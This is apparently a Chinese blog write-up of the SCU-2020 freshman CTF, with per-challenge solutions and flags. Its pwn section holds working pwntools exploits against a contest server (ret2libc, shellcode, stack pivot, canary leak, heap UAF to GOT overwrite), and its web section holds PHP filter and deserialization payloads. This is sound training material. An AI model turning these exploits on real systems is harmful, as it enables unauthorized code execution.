Papaya

42
文章
0
分类
5
标签

SCU-2020-新生赛

没啥好说的

web

真的是签到题

截图即可

情感日记

两个部分 就在日记里

easyhtml

源代码注释

我爬我爬

robots.txt 得到ffflllaaaggg.html 访问得到base64编码 解码得到flag

看我后面

index.php.bak得到源码,弱比较,传入5201314得到flag

normalPHP

base64被过滤 用base32

?file=php://filter/read=convert.base32-encode/resource=flag.php

easyheehee

查看相应头 lookme 两次base64解码得到ffflllaaaggg.php 访问得到flag

easy_web

1
2
3
4
X-Forwarded-For: 127.0.0.1
Referer: http://scuctf.com
User-Agent: 0x401Browser
via: hgg.com

scuctf{i_am_a_powerful_hacker}

渣男记录

www.zip得到源码,select做参数 反序列化

wakeup修改了username 当手动设置的参数大于实际参数可以绕过wakeup

1
select=O:4:"Love":3:{s:8:"username";s:5:"admin";s:8:"password";i:520;}

scuctf{sadsa541-azhanana-2xzsdz}

打比赛不如看剧

binwalk 得到图片 dd提取

找到一模一样的题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
error_reporting(0);
$string = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
print (strlen($string)."\n");

for ($a = 0; $a < 62; $a++) {
    for ($b = 0; $b < 62; $b++) {
        for ($c = 0; $c < 62; $c++) {
            $flag = $string[$a] . $string[$b] . $string[$c];
            $token = md5($flag);
            if (substr($token, 7, 1) === substr($token, 9, 1) && substr($token, 14, 1) === substr($token, 17, 1)) {
                if ((intval(substr($token, 1, 1)) + intval(substr($token, 14, 1)) + substr($token, 17, 1)) / substr($token, 1, 1) === intval(substr($token, 31, 1))) {
                    echo $flag . "\n";
                }
            }
        }
    }
}

scuctf{k0ngfu_ma_make_me_happ1}

有手就行

hgg博客

Crypto

classic_1

凯撒加密,偏移13

classic_2

十六进制解密,base64解密,摩斯电码,加上{}

SCUCTF{041918FC1EF6348768578F505F69D197}

RSA_1

e=3 爆破k攻击 c-k*n可以开三次方即得到m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import gmpy2


cipher = 892408374578063131162925795619920779766603018609992406621503024400320421262482556891045333045408815199768659578199823419716777827460090306221618906101139272423449131313434967763664295600593363990276765767066758967765012850672428517786210813209127040442832574380675662826137452780727264357
n = 17076697689025821279984148703479525857912324396375097877800474725170566885465833732966897433803722770843910606215420934526050277173030062927090405120718833473629930226217051580832179577629652910778242159108718885516149768995851175071714817922775555170553827627677999093195969471873530031984433631909841287167351534954860426002075822101506835880510505034002629168205724869128357383388034971402180363910826536064357845040799329301895842061729319929568340334416516796267886218679042058969927331452548377324349084816441144473807565907927986545026739667157223640848553663532280797054758912745891410981282851031085852562257
e = 3


# 破解密文
def get_flag():
    i = 0
    while True:
        if(gmpy2.iroot(cipher+i*n, 3)[1] == True):
            flag_bin = int(gmpy2.iroot(cipher+x*n, 3)[0])
            flag = hex(flag_bin)[2:-1].decode("hex")
            print(flag)
            break
        i += 1


def get_flag_for():
    for x in range(0, 118720000):
        if(gmpy2.iroot(cipher+x*n, 3)[1] == 1):
            flag_bin = int(gmpy2.iroot(cipher+x*n, 3)[0])
            print(flag_bin)
            flag = hex(flag_bin)[2:-1].decode("hex")
            print(flag)
            break


if __name__ == "__main__":
    get_flag_for()
    # get_flag()

这里python3的decode出了点问题 用python2去decode

scuctf{8ef98504b1acb7c8c8976e60f53d9325}

math_1

EXCRT 抄一份代码 EXP

scuctf{234970795255267031279059393553}

RSA_2

分解n得到三个质数,但是不影响欧拉函数,python3还是没法decode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
'''
import gmpy2

a1 = gmpy2.mpz(199045230832669039221046041578658179479)
a2 = gmpy2.mpz(319438022064098846441615805897528174851)
a3 = gmpy2.mpz(334688613728124045578795340681788885633)
e = gmpy2.mpz(0x10001)
c = gmpy2.mpz(
    7162732898109470668490761172640544970587920562229245172318483665877098759808623298921271357899945260719802967519239)
phi = (a1-1)*(a2-1)*(a3-1)
d = gmpy2.invert(e, phi)
print(d)
m = pow(c, d, a1*a2*a3)
print(m)
print(hex(m)[2:].decode('hex'))
'''
m = 962767036565814783947965746329011592709220079643113763709122300620030874381407453748116812542077
print hex(m)[2:-1].decode('hex')

scuctf{e063d03aff353073c24617bd4b483f90}

math_2

直接网站在线解决,有两个j满足,选小的那一个

跳转

RSA_3

short_pad_attack 找博客 找代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
def short_pad_attack(c1, c2, e, n):
    PRxy.< x, y > = PolynomialRing(Zmod(n))
    PRx.< xn > = PolynomialRing(Zmod(n))
    PRZZ.< xz, yz > = PolynomialRing(Zmod(n))

    g1 = x ^ e - c1
    g2 = (x+y) ^ e - c2

    q1 = g1.change_ring(PRZZ)
    q2 = g2.change_ring(PRZZ)

    h = q2.resultant(q1)
    h = h.univariate_polynomial()
    h = h.change_ring(PRx).subs(y=xn)
    h = h.monic()

    kbits = n.nbits()//(2*e*e)
    # find root < 2^kbits with factor >= n^0.4
    diff = h.small_roots(X=114514191981019260817, beta=0.4)[0]

    return diff


def related_message_attack(c1, c2, diff, e, n):
    PRx.< x > = PolynomialRing(Zmod(n))
    g1 = x ^ e - c1
    g2 = (x+diff) ^ e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()

    return -gcd(g1, g2)[0]


if __name__ == '__main__':
    n = 91271647735744709097708757371810693819959773890255602892321052899291140524662404139036987856738557165460502348870154514187118388083897953512262523467951513248663220055679646915049292032986252072883347567763269025940548912246834125522235064649335386094011441612211361270863086815851273615300955370973053395447
    c1 = 8473924177689385097361186953656797062650227841190040965380473377780644233766714939608585534305414668494659709275756172697799483669925043356688884324887478394528746881611781366747757023562008158800275672858865552852268001893
    c2 = 8473924177689385097361186953656797062650227841190040969573197360345161215089076875501807117350711332682919389146002627145413765770680053006201105979670824332086933186715988612908312603963949643839015421185340358831260317777
    e = 3

    diff = short_pad_attack(c1, c2, e, n)
    print("difference of two messages is %d" % diff)

    m1 = related_message_attack(c1, c2, diff, e, n)
    print("m1:", m1)

在线运行Sage

scuctf{RSA_with_simple_padding}

baby_pad

最后pad_length是5 所以flag为 32-5 = 27位

classic_3[未提交]

词频分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from itertools import *
from string import printable
alphabet = list(range(256))
LETTER_FREQUENCY = {
    ' ': 0.25000,
    'e': 0.12702,
    't': 0.09056,
    'a': 0.08167,
    'o': 0.07507,
    'i': 0.06966,
    'n': 0.06749,
    's': 0.06327,
    'h': 0.06094,
    'r': 0.05987,
    'd': 0.04253,
    'l': 0.04025,
    'c': 0.02782,
    'u': 0.02758,
    'm': 0.02406,
    'w': 0.02360,
    'f': 0.02228,
    'g': 0.02015,
    'y': 0.01974,
    'p': 0.01929,
    'b': 0.01492,
    'v': 0.00978,
    'k': 0.00772,
    'j': 0.00153,
    'x': 0.00150,
    'q': 0.00095,
    'z': 0.00074
}
def IndCo(s):
    N = len(s)
    frequency = [s.count(c) for c in alphabet]
    return sum(i**2 - i for i in frequency) / (N**2 - N)
def CalKeyLength(s):
    res = []
    for kl in range(2, 38):
        subs = [s[i::kl] for i in range(kl)]
        if sum(IndCo(si) for si in subs) / kl > 0.06:
            if all(map(lambda x: kl % x, res)):
                res.append(kl)
    return res
def score(s):
    score = 0
    for c in s.lower():
        if c in LETTER_FREQUENCY:
            score += LETTER_FREQUENCY[c]
    return score
def RecoverKey(ct, kl):
    key = b''
    subs = [ct[i::kl] for i in range(kl)]
    for s in subs:
        scores = []
        for xor in range(256):
            xored_s = ''.join(chr(c ^ xor) for c in s)
            if all(c in printable for c in xored_s):
                scores.append((xor, score(xored_s)))
        key += bytes([max(scores, key=lambda x: x[1])[0]])
    return key
def Vigenere_dec(cipher, key):
    keyCircle = cycle(key)
    pt = ''
    for c in cipher:
        pt += chr(c ^ next(keyCircle))
    return pt
def main():
    cipher = bytes.fromhex('1f124d150f1f460159124952072041541d584438011e0e175f780d1944190d1755451d0e141504470108120d264a05020918254a4d0b1c4e131644551d5c074d561517120d264a0802171739094144071a4604520849480c0a15131555442d1017080b1f3f17050e0b1f1759111e1d14150e4854085a07640d0108071b780b0b440e090a1e561345140b19150513434438021649010339070544010c461e5f181b57081a591b0849506401054913142546190c0b4e17125208085e440453544059052c1e5d490d0778130e11501a0e1211080e5311045b541d5844080903040c1825174144071a4604520849480c0a150104440b2e0f51080453400b1d07444e0d0111040a4144195d1754470b2e1e161b461e324609071d1e051e43594945074d5d13181207360d0312121b3f0c0c440e09041c431249471141150517120c230e51070b07400d03055010011360070e1417201954055544350d030e46143c0a4d0501050c141111024207104154085f440c0d121f011d7c461c07501b010756550a60104d541d1b6005640e1a1b01122446190c0b4e0b0159121b14150e4e5f5f590e641b190818077c46190c0b4e1612431e0858441c560154430d6e4a170a18533c0d0807501a0e1211051b57110a5b085442073201200d4a53240e0e18501f0b1a565508564406410154600d2b1b1a0e170778051a180803181e451e0e4144065b011b4318270e51080c533f1220440e090d1b58551b57010a5e061756506410201b4616390b094401204613600749571606596054590e641e190e460223160a12040d121e47124958070c471717120d264a14080903371806110104461c5f19121e')
    cipher = b''.join(bytes([c - 1]) for c in cipher)
    kls = CalKeyLength(cipher)
    print(f"All probable key length: {kls}")
    for kl in kls:
        key = RecoverKey(cipher, kl)
        print(f"Key: {key}")
        print(Vigenere_dec(cipher, key))
if __name__ == '__main__':
    main()

scuctf{Welcomet0th3cl4ss1cCipher}

Pwn

nc

连上就是shell cat flag

ret2text

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

##io = process('./ret2text')
io = remote('121.196.34.30', 10007)

payload = 'a' * 0x18 + p64(0x4007A5)

io.sendline(payload)

io.interactive()

flag{69c751a9-fec9-440f-bbd8-f4983a7f6859}

ret2libc

LibcSearcher找不到,泄漏了一下puts发现和自己的ubuntu16一样,直接拿自己libc打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
from LibcSearcher import *


#io = process('./ret2libc')
io = remote('121.196.34.30', 10005)

elf = ELF('./ret2libc')
edi = 0x4009f3
start = 0x400790

payload = 'a' * 0x78
payload += p64(edi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(start)
io.sendlineafter('ret2libc!\n', payload)

puts = u64(io.recv(6).ljust(8, '\x00'))
success('puts : '+hex(puts))
libc = ELF('./libc-2.23.so')
offset = puts - libc.sym['puts']
success('offset : '+hex(offset))
system = offset + libc.sym['system']
binsh = offset + libc.search('/bin/sh').next()

payload = 'a' * 0x78
payload += p64(edi) + p64(binsh)
payload += p64(system) + p64(start)
io.sendlineafter('ret2libc!\n', payload)

io.interactive()

flag{a84ce74a-1810-4ab9-b0db-210d48b7a3ac}

ret2shellcode

最后mian函数返回的反汇编有点不太平常

1
2
3
4
.text:08048980                 mov     ecx, [ebp+var_4]
.text:08048983                 leave
.text:08048984                 lea     esp, [ecx-4]
.text:08048987                 retn

esp由ebp-4位置的值控制 注意一下就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
from LibcSearcher import *


#io = process('./ret2shellcode')
io = remote('121.196.34.30', 10006)
#gdb.attach(io, 'b* 0x0804894A')
sleep(0.5)
payload = p32(0x080F0A04) + \
    '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
payload += '\x00'*(0x64-len(payload))
payload += p32(0x080F0A04)+p32(0x080F0A04)
payload += 'AAAA' + p32(0x080F0A00)

io.send(payload)

io.interactive()

flag{3ef12c4b-79f0-44f5-b119-e7b6f48c9aaa}

stack_migration

栈迁移 刚好够的那种

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
from LibcSearcher import *


#io = process('./stack_migration')
io = remote('121.196.34.30', 10008)
elf = ELF('./stack_migration')
#gdb.attach(io, 'b* 0x4008C0')
ret = 0x400659
edi = 0x400993
leave = 0x4008cb

io.recvuntil('addr:')
stack = int(io.recvline()[:-1], 16)

payload = p64(edi) + p64(stack+0x18) + p64(elf.plt['system']) + '/bin/sh\x00'

payload += p64(stack-8) + p64(leave)

io.sendafter('SCUCTF:\n', payload)

io.interactive()

flag{9afea5c3-a5ff-4204-a9ba-82eb1c128f8f}

canary

覆盖掉’\x00’可以puts泄漏canary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
from LibcSearcher import *


#io = process('./canary')
io = remote('121.196.34.30', 10000)


binsh = 0x400885
io.sendlineafter('length?\n', '32')
payload = 'A'*0x18+'#'
io.sendafter('what?\n', payload)
io.recvuntil('#')
canary = '\x00'+io.recv(7)
success('canary : '+hex(u64(canary))[2:])

payload = 'A'*0x18+canary+p64(binsh)*2
io.sendafter('OK!\n', payload)

io.interactive()

flag{a482f708-a883-40b9-81f5-1f205eb565f3}

easy_uaf

unsortbin泄露libc fastbin改fk

把堆分配到bss上存堆指针的地方 把堆的指针改成freegot

edit覆盖成sysplt 然后free就变成了sys

让某个堆里写个sh free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from pwn import *
from LibcSearcher import LibcSearcher
def add(size, content):
    io.sendlineafter('>> ', '1')
    io.sendlineafter('size: ', str(size))
    io.sendafter('buf: ', content)

def edit(id, content):
    io.sendlineafter('>> ', '2')
    io.sendlineafter('idx: ', str(id))
    io.sendafter('buf: ', content)

def show(id):
    io.sendlineafter('>> ', '3')
    io.sendlineafter('idx: ', str(id))

def free(id):
    io.sendlineafter('>> ', '4')
    io.sendlineafter('idx: ', str(id))

#io = process('./easy_uaf')
io = remote('121.196.34.30', 10001)
elf = ELF('./easy_uaf')
# context.log_level='debug'

add(0x100, 'b')  # 0
add(0x60, 'a')  # 1
free(0)
add(0x60, 'a')  # 2
show(2)
malloc_hook = u64(io.recv(6)+'\x00\x00')-0x151
success(hex(malloc_hook))

# libc = LibcSearcher('__malloc_hook', malloc_hook)
libc = ELF('./libc-2.23.so')
libcbase = malloc_hook-libc.sym['__malloc_hook']
success(hex(libcbase))
sys_addr = libc.sym['system']+libcbase
success(hex(sys_addr))

fake_chunk = 0x60209d
free_got = elf.got['free']

free(2)
add(0x60, p64(fake_chunk))  # 3
free(1)
free(2)
edit(3, p64(fake_chunk))

add(0x60, '/bin/sh\x00')  # 4
# gdb.attach(p)
add(0x60, 'a'*(0x13)+p64(free_got)+p64(8))
edit(0, p64(sys_addr))
free(3)

io.interactive()

flag{be6f3d34-5cc0-4023-8f94-7238e8e4e35c}

RE

easyF5

F5

pytrade

在线pyc反编译得到base64加密串,解密得到flag

easypack

UPX解压缩,每个字符异或0x12得到flag

maze

替换一下空格

1
2
3
4
5
.*...*****
...*.*****
****..****
*****....*
********..

scuctf{DRRURRDDRDRRRDR}

crackme

IDA在输入前下断,单步到判断,修改zf,continue得到flag

scuctf{e2b2fffd4ef9306d02beafbcd668aabb}

decryptme

dump函数,爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
int main(int argc, char *argv[])
{
	char goal[]="34e8h9?<<mkCD>F@DEDCzHxxKRQRNSRS";
	int v2,v3,v4,v5,v6,v7,v8;
	for(int i=0; i<32; i++)
		for(int c=0x2f; c<0x7f; c++)
		{
			v2 = i ^ c;
			v3 = i & c;
			v7 = c;
			v6 = i;
			do
			{
				v4 = 2 * (v6 & v7);
				v7 ^= v6;
				v6 = v4;
			}
			while ( v4 );
			if(v7 == goal[i])
			{
				printf("%c",c);
				break;
			}
		}
	printf("\n");

	return 0;
}

scuctf{33c5d4954da881814420f3ba39772644}

helptingting

处理太麻烦

EXP

scuctf{b5ee21708409a1a05f5401199997bd65}

pytrade-plus

用网址内工具反编译,挨着挨着看pyc 找到controller.pyc为主要函数,一个方程z3解

scuctf{39333031323433373134303932333037}

虚假的比较函数

存在TLS

发现奇怪的运算函数sub_140015D70

hook之后发现第一个参数是输入,第二个参数是scuctf{fakeflag}

复杂计算之后与input异或,但是没有吧数据dump出来

复制代码,添加IDA宏定义自己跑

异或得到flag

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
f = open('so.in')
b = [0xeb, 0x72, 0xd4, 0x76, 0x6f, 0x9c, 0xe2, 0x99, 0x99, 0x89, 0x1, 0xfe, 0x81, 0xfb, 0x62, 0x31, 0x6b, 0xb0, 0xf7, 0xec, 0xe9, 0x9e,
     0x36, 0xc6, 0x2e, 0x9f, 0x7, 0xa0, 0x20, 0xe9, 0xcc, 0x32, 0x7c, 0x5e, 0x22, 0x5f, 0xb7, 0xa9, 0x61, 0xa5, 0xa8, 0x1c, 0x70, 0x37]
a = []
for i in range(3):
    s = f.readline()
    for j in range(16):
        a.append(int(s[j*3:j*3+2], 16))
text = ''
for i in range(44):
    text += chr(a[i] ^ b[i])
print text

easyapk

直接看so文件,tea加密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>

void decrypt(unsigned long *v, unsigned long *k)
{
	unsigned long y=v[0], z=v[1], sum=0xC6EF3720, i; /* set up */
	unsigned long delta=0x9e3779b9;                  /* a key schedule constant */
	unsigned long a=k[0], b=k[1], c=k[2], d=k[3];    /* cache key */
	for(i=0; i<32; i++)                              /* basic cycle start */
	{
		z -= ((y<<4) + c) ^ (y + sum) ^ ((y>>5) + d);
		y -= ((z<<4) + a) ^ (z + sum) ^ ((z>>5) + b);
		sum -= delta;                                /* end cycle */
	}
	v[0]=y;
	v[1]=z;
}
int main()
{
	char key[]= {0xEF, 0xBE, 0xAD, 0xDE, 0x14, 0x45, 0x11, 0xAA, 0x61, 0x73, 0x75, 0x79, 0x73, 0x64, 0x79, 0x79};
	char flag[]= {0xDB, 0x03, 0xF6, 0x88,0x08, 0xCA, 0x55, 0x15, 0x74, 0x19, 0xDA, 0xB9, 0x37, 0x46, 0x12, 0xF8,
	              0x26, 0xCA, 0xF9, 0x86, 0x40, 0x29, 0x47, 0xB5, 0xA0, 0xD6, 0xAA, 0x19, 0x42, 0x3F, 0xF1, 0x46
	             };
	decrypt((unsigned long*)flag,(unsigned long*)key);
	decrypt((unsigned long*)(flag+8),(unsigned long*)key);
	decrypt((unsigned long*)(flag+16),(unsigned long*)key);
	decrypt((unsigned long*)(flag+24),(unsigned long*)key);
	for(int i=0; i<32; i++)
		printf("%c",flag[i]);
	printf("\n");
	return 0;
}

junk

jmp selfaddr+1花指令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
f = open('so.in')
a = []
for i in range(2):
    s = f.readline()
    for j in range(16):
        a.append(int(s[j*3:j*3+2], 16))
print a
key = 'h4mbur93r'
table1 = [0]*256
table2 = [0]*256
for i in range(256):
    table1[i] = i
    table2[i] = ord(key[i % 9])

v9 = 0
for i in range(256):
    v9 = (table2[i] + v9 + table1[i]) % 256
    v2 = table1[v9]
    table1[v9] = table1[i]
    table1[i] = v2

v6 = 0
v10 = 0
flag = ''
for i in range(29):
    v6 += 1
    v10 = (v10 + table1[v6]) % 256
    v4 = table1[v10]
    table1[v10] = table1[v6]
    table1[v6] = v4
    flag += chr(a[i] ^ table1[(table1[v10] + table1[v6]) % 256])
print flag

nodebugger

长度限制32,字符限制小写的十六进制

算法插件发现有AES加密和MD5哈希

MD5用于生成最后的比较数据,直接hook

AES密匙为unk_4568E0

(在线工具属实坑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <stdio.h>
#include <openssl/aes.h>


int main()
{
	char key[]={0xC5,0x77,0xBB,0x0B,0xCB,0xAC,0x58,0x12,0x39,0xBB,0xD5,0x13,0x24,0x4D,0xAA,0x12};
	char in[]={0x67,0x76,0x42,0x90,0x5f,0x97,0x76,0x3b,0x33,0xb6,0x08,0x88,0x2c,0xdc,0xc5,0x4a};
	char out[16];
	AES_KEY aes;
	AES_set_decrypt_key(key,128,&aes);
	AES_decrypt(in,out,&aes);
	for(int i=0;i<16;i++)
	{
		printf("%02x",out[i]&0xff);
	}
	printf("\n");
	
	return 0;
}

scuctf{d178350b4f101a795b7e04eaf5c2721b}

Misc

esay_encode

三种字符猜测是摩斯电码

1
2
3
4
5
6
7
8
9
f = open('flag.txt')
for i in range(13):
    s = f.readline()
    s = s.replace('401', '.')  # long
    s = s.replace('SCU', '_')  # short
    s = s.replace(' ', '/')
    s = s.replace('#', '')
    print s[:-1]

scuctf{R3@D_B3TW33N_TH3_L1N3S}

奇怪的记录

DNS查询

scuctf{72f216f4-1798-11eb-aa2a-54e1ad16c80b}

excalibur

修改后缀为zip

路径:excalibur\assets\excalibur\lang\en_us.json

scuctf{y0u_134rn_f0r93_v3ry_w311}